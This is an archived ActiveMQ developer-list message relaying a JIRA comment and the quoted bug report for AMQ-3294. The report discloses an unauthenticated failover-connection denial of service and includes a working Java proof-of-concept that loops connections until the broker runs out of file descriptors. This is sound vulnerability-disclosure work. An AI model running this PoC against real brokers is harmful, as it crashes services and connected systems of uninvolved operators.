activemq-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Luca Carettoni (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service
Date Wed, 31 Aug 2011 17:48:10 GMT

    [ https://issues.apache.org/jira/browse/AMQ-3294?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13094720#comment-13094720
] 

Luca Carettoni commented on AMQ-3294:
-------------------------------------

Gary, thanks for your follow-up!
Haven't tested it yet but it looks indeed as a possible workaround - at least to avoid a brutal
crash.

I've just downloaded the latest stable (5.5.0) and it does not include this configuration
option in any of the configuration templates. From the security standpoint, it will be great
to see this transport option enabled by default with a reasonable value.

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial
of Service condition against the broker service. 
> In detail, an attacker can issue multiple ActiveMQ openwire connection requests using
the following connection string: 
failover:tcp://<IP>:61616
> Due to the 'failure' mechanism, all TCP connections remain active even if a valid session
is not created. 
> Please note that no valid credentials have been used. 
> After a few thousand requests, a "java.net.SocketException: Too many open files" exception
is triggered causing the freeze/crash of the broker. Connected systems may crash as well.

> During my test, the attack took around 4 minutes (in a local network) and it is highly
reliable. This is most likely an abuse of the 'failover' functionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are
affected, I assume that this issue is present in other versions as well. The problem appears
in the default configuration as well as with different authentication plugins enabled.
> Proof-Of-Concept:
> --------------------
> package openwireclient;
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
> public class GoAndCrash {
>     private static String url = "failover:tcp://";
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         url = url.concat(args[0] + ":" + args[1]);
>         int cont = 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("invalidUser",
"invalidPass", url);
>                 Connection connection = connectionFactory.createConnection();
>                 cont++;
>                 connection.start();
>             } catch (Exception ex) {
>                //do nothing
>             }
>         }
>     }
> }
> --------------------

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira

       

Mime
View raw message